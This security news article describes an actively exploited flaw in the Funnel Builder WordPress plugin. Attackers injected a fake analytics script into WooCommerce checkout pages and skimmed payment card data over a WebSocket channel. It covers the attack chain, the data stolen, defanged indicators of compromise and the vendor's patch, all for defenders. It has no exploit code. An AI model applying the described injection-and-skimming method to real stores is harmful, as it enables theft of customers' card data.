Critical Funnel Builder WordPress Plugin Bug Exploited to Steal Credit Card Data on WooCommerce Checkouts

Funnel Builder WordPress Plugin Bug Exploited to Steal Credit Cards

OverviewA critical vulnerability in the Funnel Builder plugin for WordPress has been observed being actively exploited to inject malicious JavaScript into WooCommerce checkout pages. The flaw does not require authentication to be abused and affects all versions of the plugin prior to 3.15.0.3. Funnel Builder, a component developed by FunnelKit, is used to customize checkout experiences on WooCommerce-powered stores, featuring capabilities such as one-click upsells, landing pages, and enhancements aimed at improving conversion rates. The plugin’s popularity is indicated by data from WordPress.org, which shows Funnel Builder installed on more than 40,000 active sites.

What HappenedSecurity researchers at Sansec identified a malicious campaign targeting Funnel Builder installations. The attackers leverage an exposed and unprotected checkout endpoint to alter the plugin’s global settings, enabling the injection of arbitrary JavaScript into the plugin’s External Scripts setting. This manipulation occurs without requiring credentials or prior access to an administrator account, creating a stealth path for code execution at checkout.

Technical Summary

• Vulnerability class: Unauthenticated injection of JavaScript into a WordPress plugin’s configuration (External Scripts) via the Funnel Builder’s checkout endpoint.
• Affected versions: All Funnel Builder installations prior to version 3.15.0.3.
• Malicious payload: A script masquerading as a Google Tag Manager or Google Analytics tag. The fake script loads an external JavaScript resource from a domain that is designed to resemble analytics tooling.
• Command and control: The injected script establishes a WebSocket (wss) connection to an attacker-controlled server, enabling remote control and data exfiltration.
• Delivery mechanism: The payload is delivered through a compromised “External Scripts” setting, which is normally used to load legitimate third-party scripts during checkout.

The Attack Chain1) Initial foothold: An attacker finds and exploits an exposed, publicly accessible checkout endpoint on a vulnerable Funnel Builder installation.2) Script injection: Through the unprotected endpoint, the attacker injects malicious JavaScript into the plugin’s External Scripts configuration. This script is set to run on every checkout page.3) Script masquerade: The injected code is designed to appear legitimate at a glance, mimicking common analytics or tagging scripts to avoid immediate suspicion.4) External resource loading: The script loads a remote library from a domain that resembles a legitimate analytics host, disguising itself as part of normal checkout analytics.5) WebSocket channel: A WebSocket connection is opened to an attacker-controlled domain, enabling ongoing communication and control of the injected code.6) Skimming payload delivery: The attacker’s server serves a tailored payment card skimmer that targets sensitive customer data during checkout.

The Skimmer and What It Exfiltrates

• Credit card details: Primary account numbers (PANs) and related card data as entered by customers during checkout.
• Card verification data: CVVs and card expiration information, which are often collected during payment processing flows.
• Billing information: Full billing addresses, names, contact details, and other identifying data provided by the customer.
• Additional session data: Any ancillary data surfaced by the checkout process that could assist in fraud, account compromise, or subsequent purchases.

Impact and Exposure

• Scope: The vulnerability affects a large ecosystem of WordPress sites using Funnel Builder to power their WooCommerce checkouts. With more than 40,000 active installations reported, the potential exposure is substantial.
• Financial risk: The presence of a functioning card skimmer means that attackers can perform fraudulent online transactions and potentially monetize stolen card data through common underground channels.
• Long-tail risk: Beyond immediate card theft, attackers can combine stolen data with other breaches to create more convincing phishing or account takeover campaigns, leveraging the stolen addresses and contact details.

Vendor Response and Timeline

• Discovery and disclosure: Security researchers detected the malicious activity and documented the attack chain, including the nature of the payload and its targeting of the External Scripts setting.
• Payload indicators: The payload’s naming convention, such as analytics-reports[.]com/wss/jquery-lib.js, and the WebSocket endpoint at wss://protect-wss[.]com/ws, provided concrete indicators for defenders to monitor.
• Patch release: FunnelKit addressed the vulnerability by releasing version 3.15.0.3. This update resolved the issue that allowed malicious scripts to be injected into the plugin’s configuration and blocked the attacker’s ability to leverage the exposed checkout endpoint in this manner.
• Vendor advisory: The security advisory from FunnelKit acknowledged the issue, stating that “an issue” allowed bad actors to inject scripts, and confirmed the remediation in the corresponding release.

Indicators of Compromise

• Suspicious External Scripts: Presence of unexpected or unauthorized scripts loaded via the External Scripts setting in Funnel Builder.
• Unusual analytics payloads: JavaScript resources loaded that imitate legitimate analytics tools but serve alternative, malicious logic.
• WebSocket connections: Outbound WebSocket connections to unfamiliar or attacker-controlled domains observed during checkout sessions.
• Domain patterns: Domains that resemble analytics providers but point to nonstandard endpoints or hostnames, which may be used in the disguised payload.
• Modified plugin configuration: Unexplained changes to Funnel Builder’s global settings, particularly within the External Scripts section.

Context and Related Coverage

• The vulnerability sits within a broader pattern of WordPress plugin flaws affecting checkout workflows, where attackers target interstitial plugin settings to execute arbitrary scripts.
• Prior incidents in the ecosystem have demonstrated that compromised checkout or analytics scripts can have a direct impact on payment data integrity and customer trust.
• Related coverage highlights the ongoing need to scrutinize third-party plugins and their configuration interfaces, especially those that interact with checkout processes and payment data.

ConclusionThe exploitation of the Funnel Builder WordPress plugin demonstrates how a seemingly small oversight—exposed endpoints and misused configuration fields—can enable a high-impact data theft operation focused on payment card information. The attack leverages a combination of unauthenticated access, deceptive payloads, and covert data exfiltration channels to harvest sensitive customer data during checkout. The vendor’s timely release of a patched version and their advisory underscore the importance of rapid response in the face of evolving threats targeting e-commerce workflows. As attackers continue to refine their methods, plugin administrators should remain vigilant for rogue scripts and unexpected changes within checkout configurations, and monitor for indicators of compromise associated with analytics-like payloads and WebSocket communications.